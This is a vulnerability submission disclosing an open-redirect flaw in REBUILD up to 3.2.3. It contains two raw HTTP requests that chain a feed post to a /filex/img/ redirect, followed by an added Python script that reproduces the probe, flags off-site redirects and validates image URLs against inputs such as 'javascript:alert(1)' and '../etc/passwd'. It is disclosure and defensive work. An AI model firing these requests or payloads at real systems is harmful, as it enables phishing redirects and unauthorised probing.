Submission #103390: A URL redirection vulnerability exists in the /file/img/** interface of the REBUILD system

Title: A URL redirection vulnerability exists in the /file/img/** interface of the REBUILD system
Description:

Suggested description: URL Redirection vulnerability exists in rebuild <=3.2.3

Vulnerability Type: URL Redirection
Vendor of Product: https://github.com/getrebuild/rebuild
Affected Product Code Base: <=3.2.3
Affected Component: /feeds/post/publish, /filex/img/**
Attack Type: Remote

Request message 1:

```http
POST /feeds/post/publish HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 112
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close

{"content":"333","images":["http://www.baidu.com"],"scope":"ALL","type":1,"metadata":{"entity":"Feeds"}}
```

Request message 2:

```http
GET /filex/img/http://www.baidu.com?imageView2/2/w/300/interlace/1/q/100 HTTP/1.1
Host: 192.168.0.102:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close
```
Source: https://github.com/getrebuild/rebuild/issues/596
User: Mechoy (UID 41579)
Submitted: 19 Mar 2023 18:19 (3 years ago)
Moderated: 23 Mar 2023 19:46 (4 days later)
Status: Accepted
VulDB entry: 223744 [Rebuild up to 3.2.3 /feeds/post/publish cross site scripting]
Points: 20
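The two requests in the submission describe a chain: an image URL is accepted into a feed post, and the `/filex/img/**` handler then answers a request for that "image" with a redirect to whatever follows the prefix. The script below is an added example, not part of the submission or of the REBUILD code base. It rebuilds request message 2 offline, classifies a response as an off-site redirect the way a tester would confirm the finding without following the `Location` header, and shows the server-side check that closes the issue (accept only relative object keys, or absolute URLs on an allowlist). The function names, the allowlist, the optional live probe, and the sample response used in the test are all assumptions for illustration; only the target host and the probe path come from the report.

```python
"""Open-redirect check for a /filex/img/<url> style handler (added example).

Assumptions (not from the report): the handler redirects to whatever follows
/filex/img/ when it parses as an absolute URL; helper names and the allowlist
are hypothetical.
"""
import http.client
from urllib.parse import urlsplit

TARGET = "http://192.168.0.102:18080"   # host used in the report's requests
IMAGE_URL = "http://www.baidu.com"      # external URL used in the report


def build_publish_body(image_url):
    """Body of request message 1: the external URL smuggled in as an image."""
    return {"content": "333", "images": [image_url], "scope": "ALL",
            "type": 1, "metadata": {"entity": "Feeds"}}


def build_probe(image_url, base=TARGET):
    """Path of request message 2 (pass base="" to get the request-line path)."""
    return f"{base}/filex/img/{image_url}?imageView2/2/w/300/interlace/1/q/100"


def is_external_redirect(status, location, own_host):
    """True when a 3xx response points the client at a host other than our own.
    Relative Location values and same-host absolute URLs are not a finding."""
    if not (300 <= status < 400) or not location:
        return False
    dest = urlsplit(location)
    if not dest.scheme and not dest.netloc:
        return False                     # relative redirect, stays on-site
    return dest.netloc.lower() != own_host.lower()


def validate_image_ref(ref, allowed_hosts=()):
    """Hardened server-side check for the value after /filex/img/ (and for the
    'images' array accepted by /feeds/post/publish). Returns (ok, reason)."""
    parts = urlsplit(ref)
    if parts.netloc and not parts.scheme:
        return False, "protocol-relative URL"         # //evil.example
    if parts.scheme:                                   # absolute URL
        if parts.scheme not in ("http", "https"):
            return False, "non-http scheme"            # javascript:, data:
        if parts.netloc.lower() not in {h.lower() for h in allowed_hosts}:
            return False, "host not allowlisted"
        return True, "allowlisted absolute URL"
    if ref.startswith("/") or ".." in ref.split("/"):
        return False, "path escapes storage prefix"
    return True, "relative object key"                # e.g. rb/202303/a.jpg


def probe_live(image_url=IMAGE_URL, base=TARGET, timeout=5):
    """Send request message 2 without following redirects and classify it.
    Network access is an assumption; nothing in the tests calls this."""
    u = urlsplit(base)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    conn.request("GET", build_probe(image_url, base=""),
                 headers={"User-Agent": "redirect-probe"})
    resp = conn.getresponse()
    return is_external_redirect(resp.status, resp.getheader("Location"), u.netloc)


if __name__ == "__main__":
    print(build_probe(IMAGE_URL))
    for ref in (IMAGE_URL, "//www.baidu.com", "javascript:alert(1)",
                "../etc/passwd", "rb/202303/a.jpg"):
        print(f"{ref!r}: {validate_image_ref(ref, allowed_hosts=('cdn.example.com',))}")
```

`is_external_redirect` deliberately compares `netloc` (host plus port) rather than the raw string, so a `Location` of `http://192.168.0.102:18080/...` is treated as on-site while `http://www.baidu.com?imageView2/...`, which is what the report's probe would produce, is flagged. The validator rejects the whole input class rather than blocking one host: protocol-relative URLs, non-HTTP schemes, absolute URLs off the allowlist, and keys that try to climb out of the storage prefix.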
